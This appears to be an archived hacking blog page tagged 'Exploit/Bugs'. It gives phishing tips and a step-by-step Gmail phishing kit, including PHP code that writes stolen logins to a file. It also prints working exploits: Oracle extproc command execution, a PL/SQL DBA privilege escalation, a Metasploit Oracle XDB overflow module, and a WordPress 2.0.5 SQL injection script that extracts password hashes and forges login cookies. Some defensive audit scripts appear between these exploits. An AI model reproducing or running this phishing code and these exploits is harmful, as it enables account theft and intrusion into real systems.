Showing posts with label Exploit/Bugs. Show all posts

Monday, 25 June 2012

Firefox addon makes pirating music easier

The Amazon MP3 Store may have the lowest prices on DRM free music, but for some people 79 cents for a song is just too much, especially when [john] and the folks at pirates-of-the-amazon.com can help you get that song for free. Pirates of the Amazon is a slick Firefox addon that inserts a “download 4 free” button next to the “add to cart” button in the Amazon MP3 Store. After clicking on the button, the addon refers users to a thepiratebay.org search page with bittorrent download links for the song or album. While there is no question that this makes getting your music easier, by using this addon you do run the risk of violating copyright laws, depending on which country you live in.
There isn’t much here that hasn’t been thrown into Greasemonkey scripts in the past, and we wonder if they’re marketing this to anyone at all. People who absolutely love using Amazon but hate buying stuff, perhaps? They cite a couple of interesting projects in their about section: Amazon Noir robotically abused the “Search Inside” feature to reconstruct entire books. OU Library searches your local library to see if it has the Amazon book you’re looking for.

Monday, 18 June 2012

How to send phishing page to victim

Phishing is the most used trick for email account hacking, but most people think this trick doesn't work. In my opinion, this is the best and most successful trick for hacking. Trojans and keyloggers are detected by antivirus programs, but this one is not. The only thing that matters in phishing is how you create the phishing page and send it to the victim.
The success of phishing depends on you. If you just save the login page and host it on a free host, do you think the internet user is so dumb as to log in via your URL? Why would they use your page if they can type facebook.com in the URL bar? 60% of so-called hackers just do this, think they are phishers, and suggest people not to use phishing as being a hacker. What the shit.
Do you really know phishing has a 70% share in big cyber crimes? Then how can it be a waste? Today I am going to write a few tips which can be helpful to use phishing as a hacking method.


1. Using a fake login form just like the original one is the simplest way, but it has a 10% success rate. So never use this. Try to think of something innovative and create some offer page related to the account you want to hack, and then try to get the attention of users towards your offer. Now what should the offer be? Here comes social engineering. Try to know the victim more and then think about what he likes more and wants to get. Then try to relate that with your offer and then create the page. EX: a year back in Orkut, most persons wanted to know who is invisible on chat. There are many tricks. At that time I used an invisible person finder offer as a phishing page.


2. Keep your page as real as you can. So you need to have a better understanding of website design. Better website design looks better and more real. You have to work hard on that.


3. Always send a long URL to the victim, e.g. www.yourdomain.host.com?url=www.google.com/asdf/login/offer/winprizes&method=login
Here the URL is only www.yourdomain.host.com; the rest of the query string is there to confuse the victim.


4. Always create a better HTML email which attracts the victim and looks somewhat professional. A simple plain mail doesn't have a good impact.


5. You can use DNS cache poisoning to poison the victim system's cache so that his browser is redirected to your phishing page automatically when he tries to connect to the original website. In this way a simple login form will also work. But you will have to manage the DNS poisoning.


6. You can also use tabnabbing to send the phishing page.

How to create gmail phishing page

Phishing is one of the best ways to hack a Gmail account. I had already posted some articles on phishing, but a few of those are not available due to post loss in the website transfer. So I am writing an article again.


Download the phishing page from HERE


To create a phishing page of Gmail, first open Gmail in your browser. Then click on File and then Save As.





Now you have saved gmail login page to your system.


Now open the saved page in Notepad or any other HTML editor tool. Now search for the form tag <form


You will see something like this: <form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post"> The form is set to send the data to the URL given in the action attribute.


Change the action attribute to write.php


<form id="gaia_loginform" action="write.php" method="post"> Now the form will send its data to your write.php


Now create a file write.php in the same directory and write:


<?php
header("Location: http://www.gmail.com/");
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now create an account on a free host that supports PHP and upload all the files to the server.
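A defender-side check, added here and not part of the original post: it pulls every form's action out of a saved login page and flags forms that would post credentials anywhere other than an HTTPS URL on the expected host, which is exactly the edit described above (action rewritten from accounts.google.com to a local write.php). Relative actions are resolved against the page URL the way a browser does; the expected host set and the free-host URL are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormActionCollector(HTMLParser):
    """Collect (form id, action attribute) pairs from an HTML document."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            attrs = dict(attrs)
            self.forms.append((attrs.get("id", ""), attrs.get("action", "")))


def suspicious_forms(html, page_url, expected_hosts):
    """Return the forms whose submit target is not an HTTPS URL on an expected host.

    page_url is where the page was fetched from; a relative action such as
    'write.php' is resolved against it exactly as a browser would, so the
    finding shows where the credentials would really be posted.
    """
    collector = FormActionCollector()
    collector.feed(html)
    findings = []
    for form_id, action in collector.forms:
        target = urljoin(page_url, action)
        parsed = urlparse(target)
        if parsed.scheme != "https" or (parsed.hostname or "") not in expected_hosts:
            findings.append({"id": form_id, "action": action, "resolves_to": target})
    return findings


# Constructed samples: the form tag as Gmail served it, and the rewritten tag
# from the walkthrough above as it would sit on a hypothetical free host.
EXPECTED_HOSTS = {"accounts.google.com"}
GENUINE_PAGE = ('<form id="gaia_loginform" '
                'action="https://accounts.google.com/ServiceLoginAuth" method="post">')
REWRITTEN_PAGE = '<form id="gaia_loginform" action="write.php" method="post">'

if __name__ == "__main__":
    print(suspicious_forms(GENUINE_PAGE, "https://accounts.google.com/ServiceLogin", EXPECTED_HOSTS))
    print(suspicious_forms(REWRITTEN_PAGE, "http://free-host.example/gmail/index.html", EXPECTED_HOSTS))
```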

Wednesday, 4 January 2012

Oracle (extproc)Local/Remote Command Execution Exploit



Exploit:
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi (raptor@0xdeadbeef.info)
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g
-- allows remote attackers to access arbitrary libraries outside of the
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also:
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle 9i (all versions?)
-- Oracle 10g versions prior to 10.1.0.3
--
-- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production,
-- running on both Solaris 9 and 10 systems. It will need some tweakings to
-- properly work on other platforms.
--
-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r-- 1 oracle orainst 0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_shell32
language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_shell64
language c;
end oracmd64;
/
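An audit check for the traversal the script above relies on, added here and not part of the original exploit or of Oracle's tooling: it normalises a CREATE LIBRARY file spec to see whether it escapes $ORACLE_HOME/bin (the only directory extproc was meant to load from, which is what the 10.1.0.3 fix enforces) and lists PL/SQL procedures declared IS EXTERNAL so that ones bound to a traversing library or to libc's system() stand out. ORACLE_HOME is taken from the usage example; the sample DBA_LIBRARIES rows and package source are constructed.

```python
import posixpath
import re

# Assumed installation root, taken from the usage example above ($ORACLE_HOME).
ORACLE_HOME = "/opt/oracle"


def library_escapes_bin(file_spec, oracle_home=ORACLE_HOME):
    """True if a CREATE LIBRARY file spec resolves outside $ORACLE_HOME/bin.

    extproc was only meant to load shared objects from $ORACLE_HOME/bin; the
    CVE-2004-1364 traversal works because '..' components in the spec were
    honoured, so a normalised path is what must be compared.
    """
    expanded = file_spec.replace("$ORACLE_HOME", oracle_home)
    resolved = posixpath.normpath(expanded)
    allowed = posixpath.normpath(posixpath.join(oracle_home, "bin"))
    return not (resolved == allowed or resolved.startswith(allowed + "/"))


# Matches the EXTERNAL clause of a PL/SQL procedure: the C symbol and library.
EXTERNAL_RE = re.compile(
    r'is\s+external\s+name\s+"(?P<symbol>[^"]+)"\s+library\s+(?P<lib>\w+)',
    re.IGNORECASE,
)


def external_procedures(plsql_source):
    """List (C symbol, library name) pairs declared with IS EXTERNAL."""
    return [(m.group("symbol"), m.group("lib")) for m in EXTERNAL_RE.finditer(plsql_source)]


def audit(libraries, plsql_source, oracle_home=ORACLE_HOME):
    """Flag external procedures bound to a traversing library or to libc's system().

    libraries maps LIBRARY_NAME -> FILE_SPEC (the two DBA_LIBRARIES columns);
    Oracle stores unquoted identifiers in upper case, so names are compared
    case-insensitively. Returns (symbol, library, file spec) tuples.
    """
    specs = {name.upper(): spec for name, spec in libraries.items()}
    findings = []
    for symbol, lib in external_procedures(plsql_source):
        spec = specs.get(lib.upper(), "")
        if symbol == "system" or (spec and library_escapes_bin(spec, oracle_home)):
            findings.append((symbol, lib, spec))
    return findings


# Constructed sample rows shaped like DBA_LIBRARIES, and package source shaped
# like DBA_SOURCE, mirroring the 64-bit package above.
SAMPLE_LIBRARIES = {
    "EXEC_SHELL64": "$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1",
    "GOODLIB": "$ORACLE_HOME/bin/libmycode.so",
}
SAMPLE_SOURCE = """
create or replace package body oracmd64 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_shell64
language c;
end oracmd64;
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_LIBRARIES, SAMPLE_SOURCE):
        print("external procedure -> %s via %s (%s)" % finding)
```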

Multiple Oracle Application Server Vulnerabilities



/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
-----------------------------------------------------------
-----------------------------------------------------------

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{

'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8080],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Blackhat conference.
}),

'Refs' => [
['BID', '8375'],
['CVE', '2003-0727'],
['URL',
'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
],

'DefaultTarget' => 0,
'Targets' => [

['Oracle 9.2.0.1 Universal', 0x60616d46],

],

'Keys' => ['oracle'],

'DisclosureDate' => 'Aug 18 2003',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
@_);
return($self);
}

sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}

$s->Send("GET / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();

if ($res !~ /9\.2\.0\.1\.0/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}

$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}

sub Exploit
{
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $offset = $self->GetVar('OFFSET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}

my $splat =
"meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
$self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;

my $sploit =
"GET / HTTP/1.1". "\r\n".
"Host: $target_host:$target_port". "\r\n".
"User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
"en-US; rv:1.7.12) Gecko/20050923". "\r\n".
"Accept: text/xml,application/xml,application".
"/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
"image/png,*/*;q=0.5". "\r\n".
"Accept-Language: en-us,en;q=0.5". "\r\n".
"Accept-Encoding: gzip,deflate". "\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
"Keep-Alive: 300". "\r\n".
"Connection: keep-alive". "\r\n".
"Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
"\r\n\r\n";

$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x",
$target->[0], $target->[1]));

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($sploit);
$self->Handler($s);
$s->Close();
return;
}

1;
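A detection-side counterpart to the module above, added here and not part of the Metasploit code: the overflow is reached through the Basic credential, whose decoded value in the module is "meta:" followed by several hundred bytes, so an inspector that decodes the Authorization header and flags oversized or non-printable credentials catches the shape of the request. The length threshold and the sample requests are constructed; the hostile sample uses filler bytes, not the module's payload.

```python
import base64

# Assumed threshold: a real username or password is nowhere near this long,
# while the credential the module above builds is several hundred bytes.
MAX_CREDENTIAL_LEN = 256


def parse_request(raw_request):
    """Split a raw HTTP request into (request line, {lower-case header: value})."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_basic_auth(raw_request, max_len=MAX_CREDENTIAL_LEN):
    """Decode the Basic credential and report why it looks hostile, if it does."""
    _, headers = parse_request(raw_request)
    auth = headers.get("authorization", "")
    if not auth.lower().startswith("basic "):
        return {"present": False, "suspicious": False, "reasons": []}
    try:
        decoded = base64.b64decode(auth[6:].strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"present": True, "suspicious": True, "reasons": ["undecodable base64"]}
    user, _, password = decoded.partition(b":")
    reasons = []
    if len(user) > max_len or len(password) > max_len:
        reasons.append("oversized credential: %d bytes decoded" % len(decoded))
    if any(b < 0x20 or b > 0x7E for b in decoded):
        reasons.append("non-printable bytes in credential")
    return {"present": True, "suspicious": bool(reasons), "reasons": reasons,
            "decoded_len": len(decoded)}


def build_request(credential, host="db.example:8080"):
    """Assemble a GET / request carrying the given bytes as a Basic credential."""
    return ("GET / HTTP/1.1\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n"
            % (host, base64.b64encode(credential).decode("ascii")))


# Constructed samples: a normal login and an oversized credential shaped like
# the module's 'meta:' + 442 letters, with filler bytes instead of a payload.
BENIGN_REQUEST = build_request(b"scott:tiger")
OVERSIZED_REQUEST = build_request(b"meta:" + b"a" * 442 + b"\x90" * 16)

if __name__ == "__main__":
    print(inspect_basic_auth(BENIGN_REQUEST))
    print(inspect_basic_auth(OVERSIZED_REQUEST))
```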

Wordpress 2.0.5 Trackback UTF-7 SQL Injection Exploit



Vulnerable Systems:
* WordPress version 2.0.5 and prior
Immune Systems:
* WordPress version 2.0.6

Exploit:
#!/usr/bin/python
###########################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || ||
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| _
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_
#
###########################################################
# Proof of concept code from the Hardened-PHP Project
#
# NOT FOR DISTRIBUTION
# PLEASE DO NOT SPREAD THIS CODE
#
###########################################################
#
# -= Wordpress 2.0.5 =-
# Trackback UTF-7 SQL injection exploit
#
# beware of encoded single-quotes
#
###########################################################

import urllib
import getopt
import sys
import string
import re
import time
import datetime
import md5

__argv__ = sys.argv

def banner():
    print "Wordpress 2.0.5 - Trackback UTF-7 SQL injection exploit"
    print "Copyright (C) 2006 Stefan Esser/Hardened-PHP Project"
    print " *** DO NOT DISTRIBUTE ***\n"

def usage():
    banner()
    print "Usage:\n"
    print " $ ./wordpressx.py [options]\n"
    print " -h http_url url of the Wordpress blog"
    print " f.e. http://www.wordpress.org/development/"
    print " -p id id of posting to exploit trackback (default: 1)"
    print " -i id User id to steal password hash for(default: -1)"
    print " -u username username to steal password hash for (default: ...)"
    print ""
    sys.exit(-1)

def determineCookieHash(host):

    wclient = urllib.URLopener()

    print "[+] Connecting to retrieve cookie hash"

    try:
        req = wclient.open(host + "/wp-login.php?action=logout")
    except IOError, e:
        if e[1] == 302:
            # Got a 302 redirect, but check for cookies before redirecting.
            # e[3] is a httplib.HTTPMessage instance.
            if e[3].dict.has_key('set-cookie'):
                cookie = e[3].dict['set-cookie'];
                chash = cookie[string.find(cookie, "user_")+5:]
                chash = chash[:string.find(chash, "=")]
                print "[+] Cookie hash found: %s" % chash
                return chash


    print "[-] Unable to retrieve cookie... something is wrong"
    sys.exit(-3)
    return ""

def determineIsMbstringInstalled(host, pid):

    wclient = urllib.URLopener()

    print "[+] Connecting to check if mbstring is installed"

    params = {
        'charset' : 'UTF-7',
        'title' : '+ADA-'
    }

    try:
        req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
    except IOError, e:
        if e[1] == 302:
            print "[+] ext/mbstring is installed. continue with exploit"
            return 1

    content = req.read()

    if string.find(content, 'error>1') != -1:
        print "[-] Illegal posting id choosen, test impossible"
        sys.exit(-2)

    print "[-] ext/mbstring not installed... exploit not possible"
    sys.exit(-2)
    return 0

def determineTablePrefix(host, pid):

    wclient = urllib.URLopener()

    print "[+] Connecting to determine mysql table prefix"

    params = {
        'charset' : 'UTF-7',
        'title' : 'None',
        'url' : 'None',
        'excerpt' : 'None',
        'blog_name' : '+ACc-ILLEGAL'
    }

    try:
        req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
    except IOError, e:
        if e[1] == 302:
            print "[-] Table prefix cannot be determined... exploit not possible"
            sys.exit(-2)
            return ""

    content = req.read()

    f = re.search('FROM (.*)comments WHERE', content)
    if f != None:
        prefix = f.group(1)
        print "[+] Table prefix is: %s" % prefix
        return prefix

    print "[-] Table prefix cannot be determined... exploit not possible"
    sys.exit(-2)
    return ""

def lockTrackbacks(host, pid):

    now = datetime.datetime.utcnow()
    now = now.replace(microsecond = 0)

    future = now + datetime.timedelta(days=1)
    future = future.replace(microsecond = 0)

    wclient = urllib.URLopener()

    print "[+] Connecting to lock trackbacks"

    author = "Mark Mouse"
    author_email = "mark@incidents.org"
    author_url = ""
    author_ip = "210.35.2.3"
    agent = "Internet Explorer"
    futuredate = future.isoformat(' ')
    futuredate_gmt = future.isoformat(' ')
    date = now.isoformat(' ')
    date_gmt = now.isoformat(' ')

    sql = ("%s','%s','%s','%s','%s','%s','','0','%s', "
           "'comment','0','0'),('0', '', '', '', '', '%s', '%s', "
           "'', 'spam', '', 'comment', '0','0' ) /*") % \
          ( author , author_email , author_url , author_ip , date , date_gmt , agent, futuredate, futuredate_gmt )

    sql = string.replace(sql, "'", "+ACc-")

    params = {
        'charset' : 'UTF-7',
        'title' : 'None',
        'url' : 'None',
        'excerpt' : 'None',
        'blog_name' : sql
    }

    try:
        req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))
    except IOError, e:
        if e[1] == 302:
            print "[-] Table prefix cannot be determined... exploit not possible"
            sys.exit(-2)
            return ""

    content = req.read()

    return ""

def checkUsername(host, pid, prefix, name, uid):

    wclient = urllib.URLopener()

    print "[+] Connecting to check if user %s is present" % name

    if uid != -1:
        sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE ID='%s' /*" % (prefix, uid)
    else:
        sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE user_login='%s' /*" % (prefix, name)

    sql = string.replace(sql, "'", "+ACc-")

    params = {
        'charset' : 'UTF-7',
        'title' : 'None',
        'url' : 'None',
        'excerpt' : 'None',
        'blog_name' : sql
    }

    req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))

    content = req.read()


    if string.find(content, 'Duplicate') != -1:
        return 1
    if string.find(content, 'Doppelter') != -1:
        return 1

    if uid != -1:
        print "[-] Error user_id invalid"
    else:
        print "[-] Error username invalid"
    sys.exit(-2)
    return 0


def bruteforceBit(host, pid, prefix, name, uid, bit):

    wclient = urllib.URLopener()

    nibble = (bit / 4) + 1
    bit = (bit % 4) + 1
    sql = "' AND 1=0) UNION SELECT 1 FROM %susers WHERE " % prefix

    if uid != -1:
        sql = sql + "ID='%s'" % uid
    else:
        sql = sql + "user_login='%s'" % name
    sql = sql + " and substring(reverse(lpad(conv(substring(user_pass, %d,1), 16, 2),4,'0')),%d,1)='1' /*" % (nibble, bit)

    sql = string.replace(sql, "'", "+ACc-")

    params = {
        'charset' : 'UTF-7',
        'title' : 'None',
        'url' : 'None',
        'excerpt' : 'None',
        'blog_name' : sql
    }

    req = wclient.open(host + "/wp-trackback.php?p=" + pid, urllib.urlencode(params))

    content = req.read()

    if string.find(content, '15 seconds') != -1:
        return 0
    if string.find(content, '15 Sekunden') != -1:
        return 0
    if string.find(content, 'Duplicate') != -1:
        return 1
    if string.find(content, 'Doppelter') != -1:
        return 1

    print "[-] Error retrieving password hash: unexpected reply at bit %d" % bit
    sys.exit(-2)
    return ""

def bruteforce(host, pid, prefix, name, uid):

    phash = ""

    print "[+] Retrieving the password hash bit by bit"

    for i in range(32):
        nibble = 0
        for j in range(4):
            nibble = nibble | (bruteforceBit(host, pid, prefix, name, uid, i*4+j) << j)
        phash = phash + "%x" % nibble

    return phash


def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:i:u:p:e:d:")
    except getopt.GetoptError:
        usage()

    if len(__argv__) < 2:
        usage()

    username = 'admin'
    password = None
    email = None
    domain = None
    host = None
    pid = 1
    uid = -1
    for o, arg in opts:
        if o == "-h":
            host = arg
        if o == "-p":
            pid = arg
        if o == "-i":
            uid = arg
        if o == "-u":
            username = arg
        if o == "-e":
            email = arg
        if o == "-d":
            domain = arg

    # Printout banner
    banner()

    # Check if everything we need is there
    if host == None:
        print "[-] need a host to connect to"
        sys.exit(-1)

    # if username == None:
    #     print "[-] username needed to continue"
    #     sys.exit(-1)
    # if password == None:
    #     print "[-] password needed to continue"
    #     sys.exit(-1)
    # if email == None:
    #     print "[-] email address needed to continue"
    #     sys.exit(-1)
    # if domain == None:
    #     print "[-] catch all domain needed to continue"
    #     sys.exit(-1)

    determineIsMbstringInstalled(host, pid)
    chash = determineCookieHash(host)
    lockTrackbacks(host, pid)

    prefix = determineTablePrefix(host, pid)
    checkUsername(host, pid, prefix, username, uid)

    phash = bruteforce(host, pid, prefix, username, uid)

    print "[+] Done..."
    print " The password hash is %s" % phash

    m = md5.new()
    m.update(phash)
    cphash = m.hexdigest()

    print " The logincookies are:"
    print " wordpressuser_%s=%s" % (chash, username)
    print " wordpresspass_%s=%s" % (chash, cphash)

if __name__ == "__main__":
    main()

# milw0rm.com [2007-01-07]
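The mechanism the exploit above leans on, worked through as an added example that is not part of the original code: 2.0.5 escaped the trackback fields before converting them from the charset the sender declared, so a UTF-7 sequence such as "+ACc-" (which the script substitutes for every single quote) carries no quote when the escaper runs and becomes a bare "'" only afterwards. The escaper and the INSERT shape are simplified models of the PHP side, and the sample fields are constructed; the fixed ordering converts first and escapes second.

```python
def escape_sql_string(s):
    """addslashes-style escaping: backslash the characters that end a MySQL
    string literal. This models the escaping WordPress applied to the fields."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_to_utf8(raw, charset):
    """WordPress 2.0.5 order: escape the raw bytes first, then convert from the
    charset the sender declared. A quote that only appears after conversion
    (UTF-7 '+ACc-' -> "'") is never escaped."""
    escaped = escape_sql_string(raw.decode("latin-1"))   # byte-transparent escaping
    return escaped.encode("latin-1").decode(charset)


def fixed_to_utf8(raw, charset):
    """2.0.6 order: convert first, escape the result. Every quote that will reach
    the query is visible to the escaper."""
    return escape_sql_string(raw.decode(charset))


def count_unescaped_quotes(literal_body):
    """Count single quotes in a would-be string literal that no backslash protects."""
    count, i = 0, 0
    while i < len(literal_body):
        if literal_body[i] == "\\":
            i += 2          # skip the escaped character
            continue
        if literal_body[i] == "'":
            count += 1
        i += 1
    return count


def build_insert(blog_name):
    """The shape of the trackback INSERT; the quoted literal is what the injection targets."""
    return "INSERT INTO wp_comments (comment_author) VALUES ('%s')" % blog_name


# Constructed samples: the prefix-discovery field from the exploit above and a
# harmless name that a correct escaper must still handle.
PROBE = b"+ACc-ILLEGAL"
NAME = b"O'Brien"

if __name__ == "__main__":
    for raw in (PROBE, NAME):
        for label, convert in (("2.0.5", vulnerable_to_utf8), ("2.0.6", fixed_to_utf8)):
            body = convert(raw, "utf-7")
            print(label, build_insert(body), "| unescaped quotes:", count_unescaped_quotes(body))
```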

Wordpress 2.3.3 Exploit/Vulnerability - Adds Spam Directory



Tonight, while checking my site backup's sync log, I noticed a folder named "1" in the output, residing at the top level of the wp-content folder. Within the "1" folder, there are 71 separate files -- 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content's index.php file (which just says 'silence is golden') had also been edited or replaced -- but the only change is a blank line on row one. My site itself wasn't hacked -- all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the "1" folder.

I checked my sftp, ftp, and access logs, and there's nothing suspicious there at all -- which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, nothing seemed out of whack (there are no references to "poker.html" in any of the log files, for instance). The g.js file contains one "var str" definition that's ASCII encoded; I decoded it and got this output (line breaks added for readability):

var referer = escape(document.referrer);"
"var fromd = escape(document.location);"
"document.write("<fram"+"eset frame"+"border=0
frames"+"pacing=0 border=0 rows=\"1"+"00%, *
\"noresize><fr"+"ame name=\"online\" src=\""+
fid+"&q="+q1+"&referer="+referer+"&l="+lang+"
&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

